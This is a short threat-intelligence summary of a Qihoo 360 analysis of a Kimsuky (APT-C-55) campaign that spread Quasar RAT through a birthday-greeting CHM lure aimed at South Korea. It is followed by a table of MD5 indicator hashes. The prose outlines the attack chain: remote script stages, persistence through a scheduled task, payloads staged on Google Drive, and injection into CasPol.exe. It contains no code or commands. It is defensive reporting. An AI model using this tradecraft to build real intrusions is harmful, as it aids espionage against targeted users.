APT-C-55(Kimsuky)组织假借“生日祝福”为诱饵分发Quasar RAT的攻击活动分析
2023-06-05 • Qihoo360 • Analysis of the attack activities of the APT-C-55 (Kimsuky) organization distributing Quasar RAT under the guise of "birthday greetings" as bait •
360 attributes with medium confidence an APT-C-55/Kimsuky campaign that used Korean-language artifacts and a birthday-greeting CHM lure to target South Korea. Execution of the CHM loaded remote VBS and PowerShell stages, created a WindowsAppCertification directory under ProgramData, established a scheduled task, and downloaded additional payloads from Google Drive URLs. The loader, identified internally as ProcessHollowingCsharp, RC4-decrypted Quasar RAT v1.3.0.0 and injected it into CasPol.exe, matching previously reported Kimsuky QuasarRAT activity and related malicious document tradecraft.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | 9e2d09f47cc48dd3e84205376a8f9ecb | 2023-06-05 | 2023-06-05 |
| HASH | 81424820bdf139b1fe3de3faa4e98ae6 | 2023-06-05 | 2023-06-05 |
| HASH | c26e3c33d2f3a5a13282eee6e764bd79 | 2023-06-05 | 2023-06-05 |
| HASH | ce161ed698c71ad9bebb737f301b2b89 | 2023-06-05 | 2023-06-05 |
| HASH | 2da5816578795be004ad5d4190276a7f | 2023-06-05 | 2023-06-05 |
| HASH | f667bf120d5760845fcdd2f02254eff4 | 2023-06-05 | 2023-06-05 |
| HASH | 86a2cf6525c30c9d39cd6a4b0f67670b | 2023-06-05 | 2023-06-05 |
| HASH | 8e35c04988a1ff196a12624139918f94 | 2023-06-05 | 2023-06-05 |
| HASH | a9106a7c36418b9e4a19d0c7cc654e46 | 2023-06-05 | 2023-06-05 |
| HASH | 29652a5599aab8088d8bfd453471fefd | 2023-06-05 | 2023-06-05 |
| HASH | c63336057f756c711c594e8b59b0265f | 2023-06-05 | 2023-06-05 |
| HASH | 9d8c438b710b314b2dc2e003b2f177b7 | 2023-05-24 | 2023-06-05 |